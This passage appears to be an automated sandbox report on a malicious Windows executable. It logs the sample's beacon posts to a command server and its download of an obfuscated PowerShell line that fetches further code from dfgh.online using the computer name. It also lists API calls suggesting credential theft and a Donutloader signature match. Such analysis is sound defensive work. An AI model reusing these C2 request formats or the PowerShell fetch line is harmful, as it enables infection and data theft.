                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H7v1gwpOlzHwJtn4GZw5XLILSkI7tzq5rd%2FdtFT2yOJsMVh5EeFrz4kBZexHsTDmj3vldNfXtKRNVV2o05iPux0mEhT%2BmnFrO9Mgjw0kbdl3XiPK4ntBqnVSAsaz0tVRinMGv7ju"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8fdc76a47f6dc32e-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1660&rtt_var=622&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=2126&delivery_rate=1757977&cwnd=178&unsent_bytes=0&cid=7a0426c09b3cda91&ts=445&x=0"
                                                                                                                        2025-01-06 14:40:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                        2025-01-06 14:40:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        6192.168.2.449755104.21.96.14437468C:\Users\user\Desktop\setup.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-06 14:40:29 UTC274OUTPOST /api HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: multipart/form-data; boundary=CKYY1BGZ
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Content-Length: 1042
                                                                                                                        Host: regularlavhis.click
                                                                                                                        2025-01-06 14:40:29 UTC1042OUTData Raw: 2d 2d 43 4b 59 59 31 42 47 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 34 45 30 33 36 45 36 46 33 31 46 32 37 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37 0d 0a 2d 2d 43 4b 59 59 31 42 47 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 4b 59 59 31 42 47 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 0d 0a 2d 2d 43 4b 59 59 31 42 47 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                        Data Ascii: --CKYY1BGZContent-Disposition: form-data; name="hwid"C04E036E6F31F2708EEA336AD54C4C07--CKYY1BGZContent-Disposition: form-data; name="pid"1--CKYY1BGZContent-Disposition: form-data; name="lid"hRjzG3--ALFA--CKYY1BGZContent-Dispositi
                                                                                                                        2025-01-06 14:40:30 UTC1130INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 06 Jan 2025 14:40:30 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: PHPSESSID=dert5qdci100b50ihamj13vso4; expires=Fri, 02 May 2025 08:27:09 GMT; Max-Age=9999999; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                        vary: accept-encoding
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NzEGlwvgCe4R61KALNAA%2FFvhHeWE1vE2Yfi5z%2BITMgPmFXOWn%2BdvfdRbQFJ8z989sJIZV2hpDnhVvsknqeotMxUN5KjP8bjFKvQS1psWDF1plvh27THC9%2Fd7gLfhFj0eFMr525%2BX"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8fdc76aaaa69de9a-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1644&rtt_var=621&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1952&delivery_rate=1776155&cwnd=209&unsent_bytes=0&cid=793032d12741b9e1&ts=532&x=0"
                                                                                                                        2025-01-06 14:40:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                        2025-01-06 14:40:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        7192.168.2.449756104.21.96.14437468C:\Users\user\Desktop\setup.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-06 14:40:30 UTC268OUTPOST /api HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Content-Length: 113
                                                                                                                        Host: regularlavhis.click
                                                                                                                        2025-01-06 14:40:30 UTC113OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 43 30 34 45 30 33 36 45 36 46 33 31 46 32 37 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37
                                                                                                                        Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--ALFA&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=C04E036E6F31F2708EEA336AD54C4C07
                                                                                                                        2025-01-06 14:40:31 UTC1137INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 06 Jan 2025 14:40:31 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: PHPSESSID=orclc7nbmv6dg7nob9grfa4fhv; expires=Fri, 02 May 2025 08:27:10 GMT; Max-Age=9999999; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                        vary: accept-encoding
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FlAwZlnkLE4xpx%2B9fKoxf6LoeMICe2qC7SGfUfGzROfgsCkPpePZqozXZJKNfhM4aBKSo%2BB7Om%2BJ%2F59HxHjEHZuzMcl1SVNGfJWaGl%2BOVmjjsVWoGe0mc0%2FZwu%2BaUjglVT4eMid3"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8fdc76b14be91a48-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=28419&min_rtt=2001&rtt_var=16537&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=1017&delivery_rate=1459270&cwnd=157&unsent_bytes=0&cid=e0ec49c5b2cca096&ts=493&x=0"
                                                                                                                        2025-01-06 14:40:31 UTC218INData Raw: 64 34 0d 0a 4c 67 4a 41 44 46 37 2f 61 4b 6d 64 74 6b 74 31 68 75 46 67 70 38 44 77 47 51 48 6f 42 50 64 4c 79 31 53 31 76 78 34 59 54 44 70 31 65 57 4a 35 66 4d 56 4b 77 65 6e 43 4f 77 61 38 76 55 2f 37 37 35 4e 38 5a 70 30 71 68 43 4f 6b 4a 4f 6d 51 4a 69 31 37 44 68 77 30 63 6a 68 71 79 54 53 47 37 64 35 6c 41 66 36 56 51 6f 76 69 6c 6d 30 6a 30 6a 62 62 61 61 35 32 6a 34 35 6a 4e 44 63 59 57 79 42 36 4c 6a 61 4c 48 4e 6e 75 6a 42 64 61 32 73 34 4c 79 36 6d 41 62 33 53 46 62 59 51 2b 6f 6e 72 47 31 33 46 6f 45 42 56 48 62 44 52 54 50 5a 4d 59 39 75 37 65 4b 6c 76 79 6d 52 53 46 37 4e 4a 2f 64 63 6f 2b 78 32 66 70 4d 5a 65 46 4c 6d 55 52 0d 0a
                                                                                                                        Data Ascii: d4LgJADF7/aKmdtkt1huFgp8DwGQHoBPdLy1S1vx4YTDp1eWJ5fMVKwenCOwa8vU/775N8Zp0qhCOkJOmQJi17Dhw0cjhqyTSG7d5lAf6VQovilm0j0jbbaa52j45jNDcYWyB6LjaLHNnujBda2s4Ly6mAb3SFbYQ+onrG13FoEBVHbDRTPZMY9u7eKlvymRSF7NJ/dco+x2fpMZeFLmUR
                                                                                                                        2025-01-06 14:40:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        8192.168.2.449757185.161.251.214437468C:\Users\user\Desktop\setup.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-06 14:40:32 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Host: cegu.shop
                                                                                                                        2025-01-06 14:40:32 UTC249INHTTP/1.1 200 OK
                                                                                                                        Server: nginx/1.26.2
                                                                                                                        Date: Mon, 06 Jan 2025 14:40:32 GMT
                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                        Content-Length: 329
                                                                                                                        Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                        Connection: close
                                                                                                                        ETag: "676c9e2a-149"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        2025-01-06 14:40:32 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                        Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                                        Statistics

                                                                                                                        CPU Usage

                                                                                                                        Click to jump to process

                                                                                                                        Memory Usage

                                                                                                                        Click to jump to process

                                                                                                                        High Level Behavior Distribution

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        System Behavior

                                                                                                                        General

                                                                                                                        Target ID:0
                                                                                                                        Start time:09:40:01
                                                                                                                        Start date:06/01/2025
                                                                                                                        Path:C:\Users\user\Desktop\setup.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\setup.exe"
                                                                                                                        Imagebase:0xc00000
                                                                                                                        File size:74'715'544 bytes
                                                                                                                        MD5 hash:86A4951D8E5A083679B90F2509F215FE
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.4141412203.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        Reputation:low
                                                                                                                        Has exited:false

                                                                                                                        Disassembly

                                                                                                                        Reset < >

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:2.6%
                                                                                                                          Dynamic/Decrypted Code Coverage:32.6%
                                                                                                                          Signature Coverage:31.7%
                                                                                                                          Total number of Nodes:482
                                                                                                                          Total number of Limit Nodes:41
                                                                                                                          execution_graph 90076 303f203 90077 30423b0 90076->90077 90078 303f208 RtlFreeHeap 90077->90078 90079 c34f41 90080 c34f45 90079->90080 90082 c34f5b 90079->90082 90080->90082 90083 c3e41c 7 API calls 3 library calls 90080->90083 90083->90082 90084 303bb80 90085 303bba8 90084->90085 90088 303bc35 90085->90088 90093 3040be0 LdrInitializeThunk 90085->90093 90086 303bd6d 90088->90086 90090 303bcc7 90088->90090 90092 3040be0 LdrInitializeThunk 90088->90092 90090->90086 90094 3040be0 LdrInitializeThunk 90090->90094 90092->90088 90093->90085 90094->90090 90226 c46e80 90227 c46e8c __FrameHandler3::FrameUnwindToState 90226->90227 90251 c47088 90227->90251 90229 c46e93 90230 c46fe6 90229->90230 90239 c46ebd ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 90229->90239 90267 c47b31 4 API calls 2 library calls 90230->90267 90232 c46fed 90268 c80a3b 21 API calls __FrameHandler3::FrameUnwindToState 90232->90268 90234 c46ff3 90269 c809ff 21 API calls __FrameHandler3::FrameUnwindToState 90234->90269 90236 c46ffb 90237 c46edc 90238 c46f5d 90263 c47c46 GetStartupInfoW _memcpy_s 90238->90263 90239->90237 90239->90238 90241 c46f56 90239->90241 90262 c80a15 39 API calls 3 library calls 90241->90262 90243 c46f63 90264 c47c7b GetModuleHandleW 90243->90264 90245 c46f7f 90245->90232 90246 c46f83 90245->90246 90247 c46f8c 90246->90247 90265 c809f0 21 API calls __FrameHandler3::FrameUnwindToState 90246->90265 90266 c471f9 75 API calls ___scrt_uninitialize_crt 90247->90266 90250 c46f94 90250->90237 90252 c47091 90251->90252 90270 c47d7f IsProcessorFeaturePresent 90252->90270 90254 c4709d 90271 c6fcab 10 API calls 2 library calls 90254->90271 90256 c470a2 90257 c470a6 90256->90257 90272 c81105 90256->90272 90257->90229 90260 c470bd 90260->90229 90262->90238 90263->90243 90264->90245 90265->90247 90266->90250 90267->90232 90268->90234 90269->90236 90270->90254 90271->90256 90276 c89e2c 90272->90276 90275 c6fcca 7 API calls 2 library calls 90275->90257 90277 c89e3c 90276->90277 90278 c470af 90276->90278 90277->90278 90280 c85a7c 90277->90280 90278->90260 90278->90275 90281 c85a88 __FrameHandler3::FrameUnwindToState 90280->90281 90292 c819f7 EnterCriticalSection 90281->90292 90283 c85a8f 90293 c89488 90283->90293 90286 c85aad 90308 c85ad3 LeaveCriticalSection __FrameHandler3::FrameUnwindToState 90286->90308 90289 c85aa8 90307 c859cc GetStdHandle GetFileType 90289->90307 90290 c85abe 90290->90277 90292->90283 90294 c89494 __FrameHandler3::FrameUnwindToState 90293->90294 90295 c8949d 90294->90295 90296 c894be 90294->90296 90317 c77ea2 14 API calls _memcpy_s 90295->90317 90309 c819f7 EnterCriticalSection 90296->90309 90299 c894a2 90318 c7136f 39 API calls _Deallocate 90299->90318 90301 c85a9e 90301->90286 90306 c85916 42 API calls 90301->90306 90302 c894f6 90319 c8951d LeaveCriticalSection __FrameHandler3::FrameUnwindToState 90302->90319 90303 c894ca 90303->90302 90310 c893d8 90303->90310 90306->90289 90307->90286 90308->90290 90309->90303 90320 c840e3 90310->90320 90312 c893f7 90328 c84140 14 API calls 2 library calls 90312->90328 90313 c893ea 90313->90312 90327 c8452d 6 API calls _memcpy_s 90313->90327 90316 c8944c 90316->90303 90317->90299 90318->90301 90319->90301 90325 c840f0 _memcpy_s 90320->90325 90321 c84130 90330 c77ea2 14 API calls _memcpy_s 90321->90330 90322 c8411b RtlAllocateHeap 90323 c8412e 90322->90323 90322->90325 90323->90313 90325->90321 90325->90322 90329 c89ed4 EnterCriticalSection LeaveCriticalSection _memcpy_s 90325->90329 90327->90313 90328->90316 90329->90325 90330->90323 90331 c4e280 90332 c4e289 90331->90332 90346 c4e2c3 90331->90346 90347 c5af70 64 API calls __cftof 90332->90347 90334 c4e28e 90335 c4e29b 90334->90335 90358 c5af70 64 API calls __cftof 90334->90358 90338 c4e2a7 90335->90338 90359 c5fd10 64 API calls __cftof 90335->90359 90348 c5b1b0 16 API calls __cftof 90338->90348 90340 c4e2af 90349 c66450 90340->90349 90342 c4e2b9 90360 c682a0 84 API calls __cftof 90342->90360 90344 c4e2be 90361 c6a990 64 API calls __cftof 90344->90361 90347->90334 90348->90340 90350 c6645d 90349->90350 90351 c66459 90349->90351 90362 c6cc50 90350->90362 90351->90342 90353 c6646c 90355 c66492 90353->90355 90367 c663f0 42 API calls 90353->90367 90356 c664b6 90355->90356 90368 c663f0 42 API calls 90355->90368 90356->90342 90358->90335 90359->90338 90360->90344 90361->90346 90369 c7a5b8 90362->90369 90365 c6cc63 CreateMutexA 90365->90353 90366 c6cc61 90366->90353 90367->90355 90368->90356 90370 c8490a 90369->90370 90371 c84948 90370->90371 90373 c84933 HeapAlloc 90370->90373 90377 c8491c _memcpy_s 90370->90377 90379 c77ea2 14 API calls _memcpy_s 90371->90379 90374 c84946 90373->90374 90373->90377 90375 c6cc58 90374->90375 90375->90365 90375->90366 90377->90371 90377->90373 90378 c89ed4 EnterCriticalSection LeaveCriticalSection _memcpy_s 90377->90378 90378->90377 90379->90375 90380 3043bc0 90381 3043bd1 90380->90381 90382 3043d4e 90381->90382 90388 3040be0 LdrInitializeThunk 90381->90388 90383 3043ebe 90382->90383 90385 303f1d0 RtlAllocateHeap 90382->90385 90386 3043de9 90385->90386 90386->90383 90389 3040be0 LdrInitializeThunk 90386->90389 90388->90382 90389->90383 90390 c92100 90391 c9212f __snprintf_s 90390->90391 90392 c92649 CreateFileMappingW 90391->90392 90393 c9268c __snprintf_s 90392->90393 90394 c92cc1 MapViewOfFile 90393->90394 90395 c92cfc __snprintf_s 90394->90395 90398 c47006 5 API calls ___raise_securityfailure 90395->90398 90397 c93098 90398->90397 90399 303084d 90400 303085b 90399->90400 90401 30309fb GetComputerNameExA 90400->90401 90402 30211d0 90403 30211e0 90402->90403 90403->90403 90404 3044270 LdrInitializeThunk 90403->90404 90405 30212ef 90404->90405 90406 303bdd0 90407 303be10 CoCreateInstance 90406->90407 90409 303c7a1 90407->90409 90410 303c1fb SysAllocString 90407->90410 90412 303c7b1 GetVolumeInformationW 90409->90412 90413 303c2a3 90410->90413 90419 303c7d3 90412->90419 90414 303c790 SysFreeString 90413->90414 90415 303c2ab CoSetProxyBlanket 90413->90415 90414->90409 90416 303c2cb SysAllocString 90415->90416 90421 303c766 90415->90421 90418 303c3c0 90416->90418 90418->90418 90420 303c3fe SysAllocString 90418->90420 90422 303c429 90420->90422 90421->90414 90422->90421 90423 303c46d VariantInit 90422->90423 90425 303c4f0 90423->90425 90424 303c755 VariantClear 90424->90421 90425->90424 90095 3043110 90097 3043130 90095->90097 90096 30431bf 90097->90096 90099 3040be0 LdrInitializeThunk 90097->90099 90099->90096 90105 3033f97 CoSetProxyBlanket 90106 300e594 90107 300e60e 90106->90107 90108 300e5f1 90106->90108 90108->90107 90110 3040be0 LdrInitializeThunk 90108->90110 90110->90107 90426 3044450 90427 3044469 90426->90427 90428 304448f 90426->90428 90427->90428 90432 3040be0 LdrInitializeThunk 90427->90432 90430 30444b8 90430->90428 90433 3040be0 LdrInitializeThunk 90430->90433 90432->90430 90433->90428 90111 3041092 90112 304109c 90111->90112 90115 30411de 90112->90115 90118 3040be0 LdrInitializeThunk 90112->90118 90114 304132e 90115->90114 90117 3040be0 LdrInitializeThunk 90115->90117 90117->90114 90118->90115 90434 300cdd6 CoInitializeEx CoInitializeEx 90119 c3e462 90134 c3f329 90119->90134 90121 c3e469 90139 c6fc3e 90121->90139 90123 c3e4fd 90163 c2dd25 RaiseException CallUnexpected 90123->90163 90124 c3e4c5 90162 c3e51d EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 90124->90162 90126 c3e472 __EH_prolog3 90126->90123 90126->90124 90131 c3e4ab 90126->90131 90161 c3df50 TlsAlloc InitializeCriticalSection RaiseException 90126->90161 90127 c3e502 90131->90123 90142 c3e131 EnterCriticalSection 90131->90142 90132 c3e4bf 90132->90123 90132->90124 90133 c3e4d1 Concurrency::details::ExternalContextBase::~ExternalContextBase 90135 c3f347 90134->90135 90136 c3f334 LeaveCriticalSection 90134->90136 90164 c2dd25 RaiseException CallUnexpected 90135->90164 90136->90121 90138 c3f34c 90140 c6fc86 RaiseException 90139->90140 90141 c6fc58 90139->90141 90140->90126 90141->90140 90145 c3e155 90142->90145 90143 c3e268 LeaveCriticalSection 90165 c2dd3f RaiseException CallUnexpected 90143->90165 90145->90143 90147 c3e1a7 90145->90147 90148 c3e1bc GlobalHandle 90145->90148 90160 c3e205 _memcpy_s 90145->90160 90146 c3e235 LeaveCriticalSection 90146->90132 90154 c3e1af GlobalAlloc 90147->90154 90150 c3e250 90148->90150 90151 c3e1cf GlobalUnlock 90148->90151 90150->90143 90153 c3e255 GlobalHandle 90150->90153 90155 c2659e 90151->90155 90153->90143 90156 c3e261 GlobalLock 90153->90156 90157 c3e1f1 90154->90157 90158 c3e1e5 GlobalReAlloc 90155->90158 90156->90143 90157->90150 90159 c3e1f5 GlobalLock 90157->90159 90158->90157 90159->90143 90159->90160 90160->90146 90161->90131 90162->90133 90163->90127 90164->90138 90436 30125e0 90441 30125f9 90436->90441 90437 3012600 90438 3012d7a RtlExpandEnvironmentStrings 90438->90441 90439 3040be0 LdrInitializeThunk 90439->90441 90440 3013096 RtlExpandEnvironmentStrings 90440->90441 90441->90437 90441->90438 90441->90439 90441->90440 90166 303f220 90167 303f25e 90166->90167 90168 303f242 90166->90168 90167->90167 90173 303f33f 90167->90173 90175 303f1d0 90167->90175 90168->90167 90174 3040be0 LdrInitializeThunk 90168->90174 90171 303f300 90171->90173 90178 3040be0 LdrInitializeThunk 90171->90178 90174->90167 90176 30423b0 90175->90176 90177 303f1da RtlAllocateHeap 90176->90177 90177->90171 90178->90173 90442 c801ac 90443 c801b5 90442->90443 90446 c801cb 90442->90446 90443->90446 90448 c80204 90443->90448 90445 c801c2 90445->90446 90465 c804e2 15 API calls 3 library calls 90445->90465 90449 c8020d 90448->90449 90450 c80210 90448->90450 90449->90445 90466 c888de 90450->90466 90455 c8022d 90494 c802b3 90455->90494 90456 c80221 90516 c84140 14 API calls 2 library calls 90456->90516 90459 c80227 90459->90445 90462 c80251 90518 c84140 14 API calls 2 library calls 90462->90518 90464 c80257 90464->90445 90465->90446 90467 c80216 90466->90467 90468 c888e7 90466->90468 90472 c88b75 GetEnvironmentStringsW 90467->90472 90519 c83eb3 39 API calls 3 library calls 90468->90519 90470 c8890a 90520 c886e9 49 API calls 4 library calls 90470->90520 90473 c88b8d 90472->90473 90474 c8021b 90472->90474 90521 c87374 WideCharToMultiByte __wsopen_s 90473->90521 90474->90455 90474->90456 90476 c88baa 90477 c88bbf 90476->90477 90478 c88bb4 FreeEnvironmentStringsW 90476->90478 90522 c8490a 15 API calls _memcpy_s 90477->90522 90478->90474 90480 c88bc6 90481 c88bce 90480->90481 90482 c88bdf 90480->90482 90523 c84140 14 API calls 2 library calls 90481->90523 90524 c87374 WideCharToMultiByte __wsopen_s 90482->90524 90485 c88bd3 FreeEnvironmentStringsW 90489 c88c10 90485->90489 90486 c88bef 90487 c88bfe 90486->90487 90488 c88bf6 90486->90488 90526 c84140 14 API calls 2 library calls 90487->90526 90525 c84140 14 API calls 2 library calls 90488->90525 90489->90474 90492 c88bfc FreeEnvironmentStringsW 90492->90489 90495 c802c8 90494->90495 90496 c840e3 _memcpy_s 14 API calls 90495->90496 90497 c802ef 90496->90497 90498 c802f7 90497->90498 90503 c80301 90497->90503 90527 c84140 14 API calls 2 library calls 90498->90527 90500 c80234 90517 c84140 14 API calls 2 library calls 90500->90517 90501 c8035e 90530 c84140 14 API calls 2 library calls 90501->90530 90503->90501 90503->90503 90504 c840e3 _memcpy_s 14 API calls 90503->90504 90505 c8036d 90503->90505 90509 c80388 90503->90509 90528 c83a60 39 API calls _memcpy_s 90503->90528 90529 c84140 14 API calls 2 library calls 90503->90529 90504->90503 90531 c804b3 14 API calls ___free_lconv_mon 90505->90531 90508 c80373 90532 c84140 14 API calls 2 library calls 90508->90532 90534 c7139c 11 API calls __FrameHandler3::FrameUnwindToState 90509->90534 90511 c8037a 90533 c84140 14 API calls 2 library calls 90511->90533 90515 c80394 90516->90459 90517->90462 90518->90464 90519->90470 90520->90467 90521->90476 90522->90480 90523->90485 90524->90486 90525->90492 90526->90492 90527->90500 90528->90503 90529->90503 90530->90500 90531->90508 90532->90511 90533->90500 90534->90515 90535 3039ee7 90536 3039eeb 90535->90536 90538 3039ef3 90536->90538 90539 3040be0 LdrInitializeThunk 90536->90539 90539->90536 90540 3018664 90541 3018670 90540->90541 90542 3018810 CryptUnprotectData 90541->90542 90179 302f128 90180 302f15e GetComputerNameExA 90179->90180 90182 c822e2 90185 c822ee __cftof __FrameHandler3::FrameUnwindToState 90182->90185 90183 c822f5 90200 c77ea2 14 API calls _memcpy_s 90183->90200 90185->90183 90188 c8231b 90185->90188 90186 c822fa 90201 c7136f 39 API calls _Deallocate 90186->90201 90195 c819f7 EnterCriticalSection 90188->90195 90189 c82305 90191 c82326 90196 c82361 90191->90196 90195->90191 90198 c8236e 90196->90198 90197 c82331 90202 c82358 LeaveCriticalSection __FrameHandler3::FrameUnwindToState 90197->90202 90198->90197 90203 c78178 43 API calls 90198->90203 90200->90186 90201->90189 90202->90189 90203->90198 90204 c3deec 8 API calls 90543 300d972 90549 30097a0 90543->90549 90545 300d97a CoUninitialize 90546 300d9b0 90545->90546 90547 300dd1c CoUninitialize 90546->90547 90548 300dd50 90547->90548 90550 30097b4 90549->90550 90550->90545 90551 300e773 90552 300e7a4 90551->90552 90553 300e783 90551->90553 90556 300e85e 90552->90556 90568 3040be0 LdrInitializeThunk 90552->90568 90553->90552 90567 3040be0 LdrInitializeThunk 90553->90567 90559 3028780 90556->90559 90558 300e8f3 90560 30287b0 90559->90560 90560->90560 90561 302881e 90560->90561 90569 3040be0 LdrInitializeThunk 90560->90569 90561->90561 90563 303f1d0 RtlAllocateHeap 90561->90563 90566 302896e 90561->90566 90564 30288c5 90563->90564 90564->90566 90570 3040be0 LdrInitializeThunk 90564->90570 90566->90558 90567->90552 90568->90556 90569->90561 90570->90566 90571 3040e77 90572 3040e9e 90571->90572 90573 3040e86 90571->90573 90573->90572 90575 3040be0 LdrInitializeThunk 90573->90575 90575->90572 90205 302f9b6 90206 302f9e0 90205->90206 90207 302faae 90206->90207 90209 3040be0 LdrInitializeThunk 90206->90209 90209->90207 90576 30431f0 90577 3043210 90576->90577 90577->90577 90578 30432ea 90577->90578 90584 3040be0 LdrInitializeThunk 90577->90584 90580 303f1d0 RtlAllocateHeap 90578->90580 90583 30434ab 90578->90583 90581 30433da 90580->90581 90581->90583 90585 3040be0 LdrInitializeThunk 90581->90585 90584->90578 90585->90583 90586 1020375 90587 1020383 90586->90587 90600 1020cc5 90587->90600 90589 102051b GetPEB 90591 1020598 90589->90591 90590 10204d6 90590->90589 90599 1020809 90590->90599 90603 1020a85 90591->90603 90594 10205f9 CreateThread 90595 10205d1 90594->90595 90614 1020935 GetPEB 90594->90614 90595->90599 90612 1020f85 GetPEB 90595->90612 90597 1020653 90598 1020a85 5 API calls 90597->90598 90597->90599 90598->90599 90601 1020cd2 90600->90601 90613 1020ce5 GetPEB 90600->90613 